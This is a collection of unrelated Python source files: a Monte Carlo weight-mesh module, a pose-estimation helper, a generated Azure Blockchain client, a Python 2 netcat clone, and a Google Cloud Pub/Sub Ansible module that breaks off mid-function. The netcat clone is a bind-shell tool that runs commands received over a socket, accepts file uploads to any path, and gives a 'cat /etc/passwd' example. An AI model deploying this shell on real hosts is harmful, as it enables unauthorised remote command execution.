                nps_second, probabilities_second = prepare_probabilities_and_nps(
                    second.nps, second.wm.weights[i]
                )
                nps = np.array(nps_first + nps_second, dtype=float)
                # Weighted average of probabilities, then back to weights.
                combined_probabilities = (
                    nps_first * probabilities_first + nps_second * probabilities_second
                ) * reciprocal(nps)
                merged_weights.append(reciprocal(combined_probabilities))
            wm = first.wm
            return WgtMesh.MergeSpec(
                cls(
                    wm._geometry_spec,
                    wm.energies,
                    merged_weights,
                ),
                first.nps + second.nps,
            )
        else:
            return first
    def reciprocal(self) -> "WgtMesh":
        """
        Invert weights values.
        To be used for anti-forward method of weight generation.
        Returns
        -------
        out:
            Reciprocal of this weights
        """
        # Uses the module-level reciprocal() helper (zeros stay zero).
        return WgtMesh(
            self._geometry_spec, self.energies, list(map(reciprocal, self.weights))
        )
    def normalize(
        self, normalization_point: Point, normalized_value: float = 1.0, energy_bin=-1
    ) -> "WgtMesh":
        """
        Scale weights to have value `value` at `normalisation_point`.
        All other voxels are scaled proportionally.
        Args:
            normalization_point: Coordinates of point where the weights should equal `value`.
            normalized_value: The value which should be at `normalization_point`
            energy_bin: index of energy bin at which set normalized value, default - the last one.
        Returns:
            New normalized weights.
        """
        gs = self._geometry_spec
        x, y, z = normalization_point
        ix, iy, iz = gs.select_indexes(i_values=x, j_values=y, k_values=z)
        new_weights = []
        value_at_normalisation_point = self.weights[0][energy_bin, ix, iy, iz]
        """The value at last energy bin about 20 MeV at neutron weights."""
        factor = normalized_value / value_at_normalisation_point
        """Scale all other weights by this value."""
        for i, w in enumerate(self.weights):
            # TODO dvp: revise for multiple energy bins, may be add scaling values for each energy bin and particle
            value_at_normalisation_point = w[
                energy_bin, ix, iy, iz
            ]  # the last energy bin about 20 MeV.
            new_weights.append(w * factor)
        return WgtMesh(gs, self.energies, new_weights)
    def invert(
        self, normalization_point: Point, normalized_value: float = 1.0
    ) -> "WgtMesh":
        """Get reciprocal of self weights and normalize to 1 at given point.
        Important:
            A caller specifies normalization_point in local coordinates. See :class:`GeometrySpec.local_coordinates`.
        Args:
            normalization_point: Point at which output weights should be 1
            normalized_value: value which should be set at `normalization_point`.
        Returns:
            WgtMesh: Normalized reciprocal of self weights.
        """
        return self.reciprocal().normalize(normalization_point, normalized_value)
    @property
    def geometry_spec(self):
        """The underlying Cartesian or cylinder geometry specification."""
        return self._geometry_spec
    def drop_lower_energies(self, min_energy: float, part: int = 0) -> "WgtMesh":
        """Return a mesh with energy groups below `min_energy` removed from `part`."""
        if len(self.energies) <= part:
            raise ValueError(f"invalid value for weights object part: {part}")
        energies = self.energies[part]
        energies_to_retain = min_energy <= energies
        # Always keep the leading zero bound.
        energies_to_retain[0] = True
        if np.all(energies_to_retain):
            return self
        else:
            new_energies = []
            new_weights = []
            for i in range(len(self.energies)):
                if i == part:
                    new_energies.append(self.energies[i][energies_to_retain])
                    # Weight groups are offset by one relative to the bounds.
                    new_weights.append(self.weights[i][energies_to_retain[1:], :, :, :])
                else:
                    new_energies.append(self.energies[i])
                    new_weights.append(self.weights[i])
            gs = self._geometry_spec
            return WgtMesh(gs, new_energies, new_weights)
def reciprocal(a: np.ndarray, zero_index: np.ndarray = None) -> np.ndarray:
    """Element-wise reciprocal with zero entries mapped to zero.

    Args:
        a: input array; converted to float when needed.
        zero_index: optional precomputed boolean mask of zero entries;
            when provided it must equal ``a == 0.0``.

    Returns:
        Array of ``1/a`` with zero entries left as ``0.0``.
    """
    if a.dtype != float:
        a = np.array(a, dtype=float)
    if zero_index is None:
        zero_index = a == 0.0
    else:
        assert np.array_equal(zero_index, a == 0.0)
    # Provide a zero-initialized `out`: np.reciprocal with `where=` leaves
    # unselected entries uninitialized unless an output array is supplied,
    # so the masked (zero) entries are guaranteed to stay 0.0.
    result: np.ndarray = np.reciprocal(
        a, where=np.logical_not(zero_index), out=np.zeros_like(a)
    )
    return result
def prepare_probabilities_and_nps(
    _nps: int, _weights: np.ndarray
) -> Tuple[np.ndarray, np.ndarray]:
    """
    Computes intermediate data for merging procedure.
    The probabilities are reciprocals to weights.
    Zero weights mean zero probabilities and don't affect the merged result.
    Args:
        _nps:
            weighting multiplier
        _weights:
            weights to convert to probabilities
    Returns:
        normalization factors and probabilities
    """
    zeros = _weights == 0.0
    probabilities = reciprocal(_weights, zero_index=zeros)
    # Every voxel gets the same weighting factor ...
    nps_array = np.full_like(_weights, _nps, dtype=int)
    # ... except zero-weight voxels, which must not affect the weighted sum.
    nps_array[zeros] = 0
    return nps_array, probabilities
def produce_strings(stream, format_spec):
    """Format values six per line, prefixing each group of six with a newline."""
    pieces = []
    for position, value in enumerate(stream):
        if position % 6 == 0:
            pieces.append("\n")
        pieces.append(format_spec.format(value))
    return pieces
def parse_coordinates(inp: List[str]) -> np.ndarray:
    """Expand a WWINP coarse-mesh token list into the full fine-bin array.

    `inp` is the flat token sequence written by WgtMesh.write for one axis:
    [x0, n1, x1, 1, n2, x2, 1, ...] - a starting coordinate followed by
    (fine-bin count, coarse boundary, ratio==1) triples. Each coarse
    interval is subdivided into its fine-bin count of equal steps.
    """
    def iter_over_coarse_mesh():
        # Yields (coordinate, fine_bins) pairs; the final coordinate is
        # paired with 1 since no interval follows it.
        is_first = True
        i = 0
        length = len(inp)
        while i < length:
            coordinate = float(inp[i])
            if is_first:
                i += 1
                is_first = False
            else:
                # Skip the ratio token ("1") that trails each coarse boundary.
                i += 2
            if length <= i:
                yield coordinate, 1
                break
            else:
                # Integer counts may be written in float notation.
                fine_bins = int(float(inp[i]))
                i += 1
                yield coordinate, fine_bins
    def iter_over_fine_mesh(_iter_over_coarse_mesh):
        # Emits the fine boundaries; each interval's end doubles as the
        # next interval's start, so only the final point is emitted last.
        prev_coordinate = None
        prev_fine_bins = None
        for coordinate, fine_bins in _iter_over_coarse_mesh:
            if prev_fine_bins == 1:
                yield prev_coordinate
            elif prev_coordinate is not None:
                res = np.linspace(
                    prev_coordinate,
                    coordinate,
                    prev_fine_bins + 1,
                    endpoint=True,
                    dtype=float,
                )
                for coord in res[:-1]:
                    yield coord
            prev_coordinate = coordinate
            prev_fine_bins = fine_bins
        yield prev_coordinate
    return np.fromiter(iter_over_fine_mesh(iter_over_coarse_mesh()), dtype=float)
def make_geometry_spec(origin, ibins, jbins, kbins, axs=None, vec=None) -> GeometrySpec:
    """Build a Cartesian or cylinder geometry spec from raw bin sequences.

    A cylinder spec is produced when `axs` is given; otherwise Cartesian.
    """
    origin, ibins, jbins, kbins = map(gs.as_float_array, [origin, ibins, jbins, kbins])
    if axs is None:
        return gs.CartesianGeometrySpec(ibins, jbins, kbins, origin=origin)
    axs, vec = map(gs.as_float_array, [axs, vec])
    return gs.CylinderGeometrySpec(
        ibins, jbins, kbins, origin=origin, axs=axs, vec=vec
    )
|
import h5py;
import os;
import argparse;
import numpy as np;
import torch;
from tqdm import tqdm;
from hourglass.hg_files.test import inference;
from hourglass.hg_files import dp;
import utils.utils as ut;
import config as cf;
parts = {'mpii':['rank', 'rkne', 'rhip',
'lhip', 'lkne', 'lank',
'pelv', 'thrx', 'neck', 'head',
'rwri', 'relb', 'rsho',
'lsho', 'lelb', 'lwri']}
def load_model(hg_dir):
    """
    Loads the Hourglass model from the given directory.
    Parameters
    ----------
    hg_dir : str
        The full path to the hourglass directory.
    Returns
    -------
    model : tuple
        Returns two variables containing the model needed by the Hourglass
        code
    """
    opt = argparse.Namespace(continue_exp='pose',exp='pose',max_iters=250);
    from hourglass.hg_files import pose as task;
    exp_path = 'exp\\pose';
    config = task.__config__
    # Ensure the experiment directory exists (already present is fine).
    try: os.makedirs(exp_path)
    except FileExistsError: pass
    config['opt'] = opt;
    config['data_provider'] = dp;
    func = task.make_network(config)
    # Restore the latest checkpoint weights into the network.
    reload(config,hg_dir);
    return (func, config);
def get_kp(frame, do, c, s):
    """
    Return the keypoints for a single frame of video.

    Parameters
    ----------
    frame : numpy.ndarray
        The frame of video to be analysed.
    do : function
        Inference function provided by the Hourglass code; returns a list
        of prediction dicts.
    c : tuple of int
        The coordinates of the image centre.
    s : float
        Image scale such that height/scale = 200.

    Returns
    -------
    keypoints : numpy.ndarray
        Keypoints of the first prediction: x, y and confidence per joint.
    """
    predictions = do(frame, c, s)
    return predictions[0]["keypoints"]
def get_kps(model, frame0, frame_gen, total):
    """
    Returns the keypoints for a sequence of video frames.
    Parameters
    ----------
    model : tuple
        The model generated by the Hourglass code.
    frame0 : numpy.ndarray
        A sample frame from the video to ajust scale.
    frame_gen : generator
        A generator which provides the sequence of frames.
    total : int
        The total number of frames in the sequence.
    Returns
    -------
    keypoints : list of numpy.ndarray
        A list of keypoint values for each frame of the sequence.
    """
    # Centre and scale are derived once from the sample frame and reused.
    c,s = ut.calc_cent_scale(frame0);
    do = get_do(model);
    kpss = [get_kp(frame0,do,c,s)]
    # initial=1 because frame0 has already been processed above.
    for frame in tqdm(frame_gen,initial=1,total=total):
        kpss.append(get_kp(frame,do,c,s));
    return kpss;
#Taken from test.py main()
def get_do(model):
    """
    Gets the do function for the hourglass code to perform inference.
    Parameters
    ----------
    model : tuple
        The model produced by the Hourglass code.
    Returns
    -------
    do : function
        The function needed for inference.
    """
    func = model[0];
    config = model[1];
    def runner(imgs):
        # Forward pass through the network in inference mode.
        return func(0, config, 'inference', imgs=torch.Tensor(np.float32(imgs)))['preds']
    def do(img, c, s):
        ans = inference(img, runner, config, c, s)
        if len(ans) > 0:
            ans = ans[:,:,:3]
        ## ans has shape N,16,3 (num preds, joints, x/y/visible)
        pred = []
        for i in range(ans.shape[0]):
            pred.append({'keypoints': ans[i,:,:]})
        return pred
    return do;
def read_heatmap(fn):
    """
    Extracts a heatmap from the given file.
    Parameters
    ----------
    fn : str
        Path to file containing heatmap.
    Returns
    -------
    dataset : numpy.ndarray
        The extracted heatmap, transposed to (H, W, C) order.
    """
    # Context manager guarantees the file handle is closed even when
    # reading fails; the previous explicit close leaked on error, and the
    # array was needlessly converted twice.
    with h5py.File(fn, 'r') as f:
        ds = np.array(f['heatmap'])
    #Equivilent to the reverse way ML reads data + the permute
    ds = np.transpose(ds, (1, 2, 0))
    return ds
def convert_keypoints(kps, inSize, outSize):
    """
    Rescale a set of keypoints from one square image size to another.

    Parameters
    ----------
    kps : numpy.ndarray
        Keypoints to convert; each row is (x, y, confidence).
    inSize : int
        Side length of the original image.
    outSize : int
        Side length of the scaled image.

    Returns
    -------
    conkps : numpy.ndarray
        The converted keypoints, wrapped in one extra leading axis.
    """
    rescaled = np.array(kps)
    factor = inSize / outSize
    limit = outSize - 1
    for point in rescaled:
        # Scale x and y by the size ratio (confidence is untouched).
        point[0] /= factor
        point[1] /= factor
        # Clamp into the target image bounds, then truncate to whole pixels.
        point[0] = max(0, min(point[0], limit))
        point[1] = max(0, min(point[1], limit))
        point[0] = int(point[0])
        point[1] = int(point[1])
    return np.array([rescaled])
def gen_heatmaps(kpss,in_size,out_size):
    """
    Takes a set of keypoints and generates coresponding heatmaps.
    Parameters
    ----------
    kpss : numpy.ndarray
        Keypoints for each frame in the sequence in MPII format.
    in_size : int
        Size of the frame used to generate keypoints (n x n).
    out_size : int
        Size of the resulting heatmap (m x m).
    Returns
    -------
    hms : list of numpy.ndarray
        Heatmaps for each keypoint of each frame.
    """
    conKps = [convert_keypoints(kps,in_size,out_size) for kps in kpss];
    hmg = dp.GenerateHeatmap(out_size,16);
    hms = [hmg(kps) for kps in conKps];
    # Scale each joint's heatmap in place by that joint's confidence value.
    for i,hm in tqdm(enumerate(hms)):
        kps = kpss[i];
        for j,m in enumerate(hm):
            p = kps[j][2];
            #if j not in [9,10,11,12,13,14,15]: p = 0;
            m *= p;
    return hms;
def reload(config,hg_dir):
    """
    load or initialize model's parameters by config from config['opt'].continue_exp
    config['train']['epoch'] records the epoch num
    config['inference']['net'] is the model
    """
    opt = config['opt']
    if opt.continue_exp:
        # Windows-style path join into the experiment checkpoint directory.
        resume = os.path.join(hg_dir + "\\exp", opt.continue_exp)
        resume_file = os.path.join(resume, 'checkpoint.pt')
        if os.path.isfile(resume_file):
            print("=> loading checkpoint '{}'".format(resume))
            checkpoint = torch.load(resume_file)
            # Restore network weights, optimizer state and epoch counter.
            config['inference']['net'].load_state_dict(checkpoint['state_dict'])
            config['train']['optimizer'].load_state_dict(checkpoint['optimizer'])
            config['train']['epoch'] = checkpoint['epoch']
            print("=> loaded checkpoint '{}' (epoch {})"
                  .format(resume, checkpoint['epoch']))
        else:
            print("=> no checkpoint found at '{}'".format(resume))
    # Default the epoch counter when starting fresh.
    if 'epoch' not in config['train']:
        config['train']['epoch'] = 0;
def get_get_kp(cap):
    """
    Returns a method for obtaining the keypoints for a single frame.
    Parameters
    ----------
    cap : cv2.VideoCapture
        A CV2 video capture object.
    Returns
    -------
    gk : function
        A function that takes a frame number and returns the keypoints.
    """
    model = load_model(cf.hg_dir);
    do = get_do(model);
    # Centre/scale come from the first frame and are reused for all frames.
    _,frame0 = cap.read();
    c,s = ut.calc_cent_scale(frame0);
    def gk(f):
        # NOTE(review): `f` is unused — frames are read sequentially from
        # `cap`, not seeked by frame number. Confirm intended.
        _,frame = cap.read();
        crop = ut.crop(frame,256,320);
        return get_kp(crop,do,c,s);
    return gk;
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
from ._configuration_async import BlockchainManagementClientConfiguration
from .operations_async import BlockchainMemberOperations
from .operations_async import BlockchainMemberOperationResultOperations
from .operations_async import LocationOperations
from .operations_async import OperationOperations
from .operations_async import SkuOperations
from .operations_async import TransactionNodeOperations
from .. import models
class BlockchainManagementClient(object):
    """REST API for Azure Blockchain Service.

    Thin service client: builds a configuration and an async ARM pipeline,
    creates (de)serializers from the generated models, and exposes one
    operations group per REST resource.

    :ivar blockchain_member: BlockchainMemberOperations operations
    :vartype blockchain_member: azure.mgmt.blockchain.aio.operations_async.BlockchainMemberOperations
    :ivar blockchain_member_operation_result: BlockchainMemberOperationResultOperations operations
    :vartype blockchain_member_operation_result: azure.mgmt.blockchain.aio.operations_async.BlockchainMemberOperationResultOperations
    :ivar location: LocationOperations operations
    :vartype location: azure.mgmt.blockchain.aio.operations_async.LocationOperations
    :ivar operation: OperationOperations operations
    :vartype operation: azure.mgmt.blockchain.aio.operations_async.OperationOperations
    :ivar sku: SkuOperations operations
    :vartype sku: azure.mgmt.blockchain.aio.operations_async.SkuOperations
    :ivar transaction_node: TransactionNodeOperations operations
    :vartype transaction_node: azure.mgmt.blockchain.aio.operations_async.TransactionNodeOperations
    :param credential: Credential needed for the client to connect to Azure.
    :type credential: ~azure.core.credentials_async.AsyncTokenCredential
    :param subscription_id: Gets the subscription Id which uniquely identifies the Microsoft Azure subscription. The subscription ID is part of the URI for every service call.
    :type subscription_id: str
    :param str base_url: Service URL
    """

    def __init__(
        self,
        credential: "AsyncTokenCredential",
        subscription_id: str,
        base_url: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        self._config = BlockchainManagementClientConfiguration(credential, subscription_id, **kwargs)
        # Fall back to the public ARM endpoint when no base_url is supplied.
        self._client = AsyncARMPipelineClient(
            base_url=base_url or 'https://management.azure.com',
            config=self._config,
            **kwargs)

        # Only class objects in the generated models module are serializable models.
        client_models = {
            name: value for name, value in models.__dict__.items() if isinstance(value, type)
        }
        self._serialize = Serializer(client_models)
        self._deserialize = Deserializer(client_models)

        # Every operations group takes the same four collaborators.
        shared = (self._client, self._config, self._serialize, self._deserialize)
        self.blockchain_member = BlockchainMemberOperations(*shared)
        self.blockchain_member_operation_result = BlockchainMemberOperationResultOperations(*shared)
        self.location = LocationOperations(*shared)
        self.operation = OperationOperations(*shared)
        self.sku = SkuOperations(*shared)
        self.transaction_node = TransactionNodeOperations(*shared)

    async def close(self) -> None:
        """Release the underlying pipeline's resources."""
        await self._client.close()

    async def __aenter__(self) -> "BlockchainManagementClient":
        await self._client.__aenter__()
        return self

    async def __aexit__(self, *exc_details) -> None:
        await self._client.__aexit__(*exc_details)
|
# ___ ___ ___ __ _____ ___ __ __ __ __
# / _/ | _ \ | __| / \ |_ _| | __| | _\ | \ \ `v' / ()
#| \__ | v / | _| | /\ | | | | _| | v | | -< `. .'
# \__/ |_|_\ |___| |_||_| |_| |___| |__/ |__/ !_! ()
# ___ __ _____ ___ __ _ _ _ _ ___ _ __
#| _ \ |__`. |_ _| | _ \ / \ | || | | || | / _/ | |/ /
#| v / |_ | | | | v / | // | ____ | >< | `._ _| | \__ | <
#|_|_\ |__.' |_| |_|_\ \__/ |____| |_||_| |_| \__/ |_|\_\
#
#project destiny: kinnda sniffer
#
#
#if you will use this tool for bad things its your falt , I have no responibilty
#about your shit so...("i gave you a hammer, you can break the window with him
#but you can fix almost everything with it, the choise is yours")
import socket
import threading
import sys
import getopt
import subprocess
#Define global variables:
listen = False
# Fixed: was `Command = False` (capital C), but the rest of the script reads
# and writes `command` (see main() and client_handler()), causing a NameError.
command = False
execute = ""
target = ""
upload_destination = ""
port = 0
#all of the functions:
def usage():
    # Print the help text and terminate the process.
    # NOTE: Python 2 print statements — this script is Python 2 only.
    print "BHP Net Tool"
    print "CREATED BY R3TR0_H4CK"
    print "Usage: netcat.py -t targer_host -p port"
    print "-l --listen -listen om [host]:[port] for incoming connections"
    print "-e --execute=file_to_run - execute the given file upon receving a connections"
    print "-c --command - initialize a command shell"
    print "-u --upload=destinition -uopn reciving connection to upload a file and write to [destinition]"
    print
    print
    print "Examples:"
    print "netcat.py -t 192.168.0.1 -p 5555 -l -c"
    print "netcat.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"
    print 'netcat.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"'
    # exit(0): usage is also called on option errors, so always stop here.
    sys.exit(0)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
try:
opts , args = getopt.getopt(sys.argv[1:], "hel:t:p:cu" , ["help" , "listen" , "execute" , "target" , "port" , "command" , "upload"])
except getopt.GetoptError as err:
print str(err)
usage()
for o,a in opts:
if o in ("-h" , "--help"):
usage()
elif o in ("-l" , "--listen"):
listen = True
elif o in ("-e" , "--execute"):
execute = a
elif o in ("-u" , "--upload"):
upload_destination = a
elif o in ("-t" , "--target"):
target = a
elif o in ("-p" , "--port"):
port = int(a)
else:
assert False, "Unhandled Option"
if not listen and len(target) and port >0:
#read in the buffer from the commandline
#to stdin
buffer = sys.stdin.read()
#send data off
client_sender(buffer)
#all options commands:
if listen:
server_loop()
def client_sender(buffer):
#setting up the socket:
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
#connecting to the target:
client.connect((target , port))
if len(buffer):
client.send(buffer)
while True:
#wait for data:
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response += data
if rev_len<4096:
break
print response
#wait for more
buffer = raw_input("")
buffer += "\n"
#send it off
client.send(buffer)
except:
print "[*] Exception! Exiting."
#disconnect
client.close()
def server_loop():
    # Listen on target:port and hand each accepted client to a worker thread.
    global target
    # Default to all interfaces when no target was supplied.
    if not target:
        target = "0.0.0.0"
    srv = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
    srv.bind((target , port))
    srv.listen(5)
    while True:
        conn, _addr = srv.accept()
        # One handler thread per connection.
        worker = threading.Thread(target=client_handler , args=(conn,))
        worker.start()
def run_command(command):
    # Run `command` through the shell and return its combined stdout/stderr,
    # or a fixed error string if execution fails.
    #trim the trailing newline:
    command = command.rstrip()
    #run the command and get output:
    try:
        output = subprocess.check_output(command , stderr=subprocess.STDOUT , shell = True)
    # Fixed: bare `except:` also swallowed KeyboardInterrupt/SystemExit;
    # Exception still covers CalledProcessError and OSError.
    except Exception:
        output = "Command Cant Be Executed..."
    return output
def client_handler(client_socket):
    # Serve one client: optionally receive an upload, run a one-shot command,
    # and/or drop into an interactive command-shell loop.
    # Fixed: was `global upload`, a name that does not exist at module level;
    # the variable actually read below is `upload_destination`.
    global upload_destination
    global execute
    global command
    #check if need to upload:
    if len(upload_destination):
        #read all the byte and write them to the destination:
        file_buffer = ""
        #will keep read while there is data:
        while True:
            data = client_socket.recv(1024)
            if not data:
                break
            else:
                file_buffer += data
        #write the data to file
        try:
            file_descriptor = open(upload_destination, "wb")
            file_descriptor.write(file_buffer)
            file_descriptor.close()
            #write thats everything went right:
            client_socket.send("Successfully Saved file to %s\r\n" %upload_destination)
        except:
            client_socket.send("Failed to save file to %s\r\n" %upload_destination)
    if len(execute):
        #run the command:
        output = run_command(execute)
        client_socket.send(output)
    if command:
        while True:
            #show a simple prompt:
            # Fixed: was `client.send` — `client` is undefined in this scope;
            # the connected socket is `client_socket`.
            client_socket.send("<BHP:#> ")
            cmd_buffer = ""
            while "\n" not in cmd_buffer:
                cmd_buffer += client_socket.recv(1024)
            #send back the command output:
            response = run_command(cmd_buffer)
            #Send to client:
            client_socket.send(response)
#calls the main function:
# Guarded so importing this module (e.g. for testing) has no side effects.
if __name__ == '__main__':
    main()
|
#!/usr/bin/python
# Copyright 2016 Google Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Module metadata consumed by ansible-doc and the module index.
ANSIBLE_METADATA = {'metadata_version': '1.0',
                    'status': ['preview'],
                    'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcpubsub
version_added: "2.3"
short_description: Create and Delete Topics/Subscriptions, Publish and pull messages on PubSub.
description:
- Create and Delete Topics/Subscriptions, Publish and pull messages on PubSub.
See U(https://cloud.google.com/pubsub/docs) for an overview.
requirements:
- "python >= 2.6"
- "google-auth >= 0.5.0"
- "google-cloud-pubsub >= 0.22.0"
notes:
- Subscription pull happens before publish. You cannot publish and pull in the same task.
author:
- "<NAME> (@supertom) <<EMAIL>>"
options:
topic:
description:
- GCP pubsub topic name. Only the name, not the full path, is required.
required: True
subscription:
description:
- Dictionary containing a subscripton name associated with a topic (required), along with optional ack_deadline, push_endpoint and pull.
For pulling from a subscription, message_ack (bool), max_messages (int) and return_immediate are available as subfields.
See subfields name, push_endpoint and ack_deadline for more information.
required: False
name:
description: Subfield of subscription. Required if subscription is specified. See examples.
required: False
ack_deadline:
description: Subfield of subscription. Not required. Default deadline for subscriptions to ACK the message before it is resent. See examples.
required: False
pull:
description:
- Subfield of subscription. Not required. If specified, messages will be retrieved from topic via the provided subscription name.
max_messages (int; default None; max number of messages to pull), message_ack (bool; default False; acknowledge the message) and return_immediately
(bool; default True, don't wait for messages to appear). If the messages are acknowledged, changed is set to True, otherwise, changed is False.
push_endpoint:
description:
- Subfield of subscription. Not required. If specified, message will be sent to an endpoint.
See U(https://cloud.google.com/pubsub/docs/advanced#push_endpoints) for more information.
required: False
publish:
description:
- List of dictionaries describing messages and attributes to be published. Dictionary is in message(str):attributes(dict) format.
Only message is required.
required: False
state:
description:
- State of the topic or queue (absent, present). Applies to the most granular resource. Remove the most granular resource. If subcription is
specified we remove it. If only topic is specified, that is what is removed. Note that a topic can be removed without first removing the
subscription.
required: False
default: "present"
'''
EXAMPLES = '''
# Create a topic and publish a message to it
# (Message will be pushed; there is no check to see if the message was pushed before
# Topics:
## Create Topic
gcpubsub:
topic: ansible-topic-example
state: present
## Delete Topic
### Subscriptions associated with topic are not deleted.
gcpubsub:
topic: ansible-topic-example
state: absent
## Messages: publish multiple messages, with attributes (key:value available with the message)
### setting absent will keep the messages from being sent
gcpubsub:
topic: "{{ topic_name }}"
state: present
publish:
- message: "this is message 1"
attributes:
mykey1: myvalue
mykey2: myvalu2
mykey3: myvalue3
- message: "this is message 2"
attributes:
server: prod
sla: "99.9999"
owner: fred
# Subscriptions
## Create Subscription (pull)
gcpubsub:
topic: ansible-topic-example
subscription:
- name: mysub
state: present
## Create Subscription with ack_deadline and push endpoint
### pull is default, ack_deadline is not required
gcpubsub:
topic: ansible-topic-example
subscription:
- name: mysub
ack_deadline: "60"
push_endpoint: http://pushendpoint.example.com
state: present
## Subscription change from push to pull
### setting push_endpoint to "None" converts subscription to pull.
gcpubsub:
topic: ansible-topic-example
subscription:
name: mysub
push_endpoint: "None"
## Delete subscription
### Topic will not be deleted
gcpubsub:
topic: ansible-topic-example
subscription:
- name: mysub
state: absent
## Pull messages from subscription
### only pull keyword is required.
gcpubsub:
topic: ansible-topic-example
subscription:
name: ansible-topic-example-sub
pull:
message_ack: yes
max_messages: "100"
'''
RETURN = '''
publish:
description: List of dictionaries describing messages and attributes to be published. Dictionary is in message(str):attributes(dict) format.
Only message is required.
returned: Only when specified
type: list
sample: "publish: ['message': 'my message', attributes: {'key1': 'value1'}]"
pulled_messages:
description: list of dictionaries containing message info. Fields are ack_id, attributes, data, message_id.
returned: Only when subscription.pull is specified
type: list
sample: [{ "ack_id": "XkASTCcYREl...","attributes": {"key1": "val1",...}, "data": "this is message 1", "message_id": "49107464153705"},..]
state:
description: The state of the topic or subscription. Value will be either 'absent' or 'present'.
returned: Always
type: str
sample: "present"
subscription:
description: Name of subscription.
returned: When subscription fields are specified
type: str
sample: "mysubscription"
topic:
description: Name of topic.
returned: Always
type: str
sample: "mytopic"
'''
# Client-library requirement constants checked in main().
CLOUD_CLIENT = 'google-cloud-pubsub'
CLOUD_CLIENT_MINIMUM_VERSION = '0.22.0'
CLOUD_CLIENT_USER_AGENT = 'ansible-pubsub-0.1'
try:
    from ast import literal_eval
    # `ast` first appeared in Python 2.6, so its import doubles as a version check.
    HAS_PYTHON26 = True
except ImportError:
    HAS_PYTHON26 = False
try:
    from google.cloud import pubsub
    # Optional dependency flag; main() fails with a friendly message if absent.
    HAS_GOOGLE_CLOUD_PUBSUB = True
except ImportError as e:
    HAS_GOOGLE_CLOUD_PUBSUB = False
def publish_messages(message_list, topic):
    """Publish every entry of *message_list* to *topic* in a single batch.

    Each entry is a dict with a required 'message' key and an optional
    'attributes' dict that is forwarded as keyword arguments.
    """
    with topic.batch() as batch:
        for entry in message_list:
            payload = entry['message']
            # Missing 'attributes' means "no attributes".
            attributes = entry.get('attributes', {})
            batch.publish(bytes(payload), **attributes)
    return True
def pull_messages(pull_params, sub):
    """
    Pull messages from subscription *sub* and optionally acknowledge them.

    :param pull_params: dict with optional keys max_messages (int),
        message_ack (bool, default False) and return_immediately (bool,
        default False).
    :param sub: pubsub subscription object supporting pull()/acknowledge().
    :rtype: tuple (output, changed)
    """
    changed = False
    max_messages = pull_params.get('max_messages', None)
    # Fixed: the default was the string 'no', which is truthy, so messages
    # were ACKed even when message_ack was omitted — contradicting the
    # module documentation ("message_ack (bool; default False ...)").
    message_ack = pull_params.get('message_ack', False)
    return_immediately = pull_params.get('return_immediately', False)
    output = []
    pulled = sub.pull(return_immediately=return_immediately,
                      max_messages=max_messages)
    for ack_id, msg in pulled:
        msg_dict = {'message_id': msg.message_id,
                    'attributes': msg.attributes,
                    'data': msg.data,
                    'ack_id': ack_id}
        output.append(msg_dict)
    if message_ack:
        ack_ids = [m['ack_id'] for m in output]
        if ack_ids:
            sub.acknowledge(ack_ids)
            # Acknowledging consumes the messages, so state changed.
            changed = True
    return (output, changed)
def main():
    """Ansible entry point: create/delete topics and subscriptions, publish
    messages, and pull from subscriptions, per the module parameters."""
    module = AnsibleModule(argument_spec=dict(
        topic=dict(required=True),
        state=dict(choices=['absent', 'present'], default='present'),
        publish=dict(type='list', default=None),
        subscription=dict(type='dict', default=None),
        service_account_email=dict(),
        credentials_file=dict(),
        project_id=dict(), ),)
    # Fail fast when runtime requirements (set up at import time) are missing.
    if not HAS_PYTHON26:
        module.fail_json(
            msg="GCE module requires python's 'ast' module, python v2.6+")
    if not HAS_GOOGLE_CLOUD_PUBSUB:
        module.fail_json(msg="Please install google-cloud-pubsub library.")
    if not check_min_pkg_version(CLOUD_CLIENT, CLOUD_CLIENT_MINIMUM_VERSION):
        module.fail_json(msg="Please install %s client version %s" % (CLOUD_CLIENT, CLOUD_CLIENT_MINIMUM_VERSION))
    # Copy of the user-facing params; echoed back in json_output at the end.
    mod_params = {}
    mod_params['publish'] = module.params.get('publish')
    mod_params['state'] = module.params.get('state')
    mod_params['topic'] = module.params.get('topic')
    mod_params['subscription'] = module.params.get('subscription')
    creds, params = get_google_cloud_credentials(module)
    pubsub_client = pubsub.Client(project=params['project_id'], credentials=creds, use_gax=False)
    pubsub_client.user_agent = CLOUD_CLIENT_USER_AGENT
    changed = False
    json_output = {}
    # t: topic handle; s: subscription handle (only when a subscription dict
    # was supplied — topic is required, so t is always set below).
    t = None
    if mod_params['topic']:
        t = pubsub_client.topic(mod_params['topic'])
    s = None
    if mod_params['subscription']:
        # Note: default ack deadline cannot be changed without deleting/recreating subscription
        s = t.subscription(mod_params['subscription']['name'],
                           ack_deadline=mod_params['subscription'].get('ack_deadline', None),
                           push_endpoint=mod_params['subscription'].get('push_endpoint', None))
    if mod_params['state'] == 'absent':
        # Remove the most granular resource. If subcription is specified
        # we remove it. If only topic is specified, that is what is removed.
        # Note that a topic can be removed without first removing the subscription.
        # TODO(supertom): Enhancement: Provide an option to only delete a topic
        # if there are no subscriptions associated with it (which the API does not support).
        if s is not None:
            if s.exists():
                s.delete()
                changed = True
        else:
            if t.exists():
